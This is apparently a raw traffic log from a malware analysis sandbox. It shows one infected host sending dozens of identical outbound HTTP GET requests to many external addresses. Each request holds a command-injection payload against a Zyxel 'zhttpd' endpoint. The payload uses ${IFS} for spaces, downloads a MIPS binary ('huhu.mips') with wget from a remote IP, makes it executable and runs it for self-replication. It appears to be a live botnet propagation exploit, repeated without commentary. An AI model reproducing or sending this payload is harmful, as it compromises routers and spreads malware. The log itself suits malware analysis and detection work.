                                              Jan 29, 2024 07:03:51.029735088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4615192.168.2.146046667.73.14.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029776096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4616192.168.2.1456424164.252.68.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029794931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4617192.168.2.1438292181.127.194.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029831886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4618192.168.2.1442702133.69.192.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029901981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4619192.168.2.1459554149.133.195.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029908895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4620192.168.2.1443870199.243.143.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029936075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4621192.168.2.1452338132.35.211.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.029970884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4622192.168.2.143642449.120.181.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030014038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4623192.168.2.1459772205.206.70.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030050039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4624192.168.2.1454830191.101.109.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030088902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4625192.168.2.146081040.191.1.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030124903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4626192.168.2.1436304211.239.69.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030154943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4627192.168.2.14445664.10.216.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030183077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4628192.168.2.1445094165.55.229.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030220985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4629192.168.2.1435894217.77.93.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030251026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4630192.168.2.1433220108.129.175.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030293941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4631192.168.2.145525287.83.182.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030312061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4632192.168.2.145716862.4.244.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030345917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4633192.168.2.144732223.6.22.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030385017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4634192.168.2.144334660.76.230.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030440092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4635192.168.2.14329128.31.67.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030462980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4636192.168.2.1440058201.185.6.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030500889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4637192.168.2.1452768222.79.62.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030553102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4638192.168.2.1450946124.161.90.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030582905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4639192.168.2.1436924203.24.151.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030620098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4640192.168.2.144190843.90.44.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030668020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4641192.168.2.1455674135.144.192.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030704021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4642192.168.2.1456924157.18.5.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030728102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4643192.168.2.1455152151.162.70.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030774117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4644192.168.2.143606276.127.155.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030808926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4645192.168.2.143706053.66.27.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030853033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4646192.168.2.1455376211.163.24.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030888081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4647192.168.2.1439900202.112.203.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030939102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4648192.168.2.1447986111.7.192.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.030986071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4649192.168.2.144073493.229.60.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031008959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4650192.168.2.144371878.239.203.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031049013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4651192.168.2.1454262128.184.191.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031066895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4652192.168.2.1444734187.227.152.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031116962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4653192.168.2.145998244.134.247.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031142950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4654192.168.2.1448732156.205.192.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031203985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4655192.168.2.1434424195.230.70.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031233072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4656192.168.2.1442020151.139.237.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031251907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4657192.168.2.1438452205.155.175.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031294107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4658192.168.2.1456724210.34.236.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031322002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4659192.168.2.144213486.152.150.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031375885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4660192.168.2.1451202164.199.228.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031424046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4661192.168.2.1455368131.20.151.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031447887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4662192.168.2.1432768163.10.141.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031474113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4663192.168.2.1446022200.164.55.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031502962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4664192.168.2.1436330122.90.214.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031560898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4665192.168.2.1443484138.181.83.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031586885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4666192.168.2.144977850.70.150.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031605005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4667192.168.2.1459764220.233.24.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031637907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4668192.168.2.146081690.49.132.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031682968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4669192.168.2.1436310206.170.20.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031723976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4670192.168.2.1457138223.61.67.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031760931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4671192.168.2.1458776119.224.198.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031793118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4672192.168.2.1439452205.192.92.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031826019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4673192.168.2.1436644210.8.66.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031867981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4674192.168.2.145548499.48.175.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031889915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4675192.168.2.143431438.184.61.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031929016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4676192.168.2.1444516185.217.84.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.031980038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4677192.168.2.146035471.128.167.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032016039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4678192.168.2.1455074116.113.7.247443
                                              TimestampBytes transferredDirectionData
